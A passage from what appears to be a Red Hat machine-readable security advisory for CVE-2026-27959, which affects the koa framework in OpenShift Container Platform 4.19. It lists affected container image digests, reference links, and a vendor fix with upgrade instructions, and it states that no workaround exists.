"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27959"
},
{
"category": "external",
"summary": "RHBZ#2442928",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442928"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27959",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27959"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959"
},
{
"category": "external",
"summary": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df",
"url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df"
},
{
"category": "external",
"summary": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb",
"url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb"
},
{
"category": "external",
"summary": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm",
"url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"
}
],
"release_date": "2026-02-26T01:45:45.668000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "Red Hat is not aware of a practical temporary workaround that fully mitigates this issue or meets Red Hat Product Security\u0027s standards for usability, deployment, applicability, or stability. Customers are advised to apply the relevant security updates once they become available.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
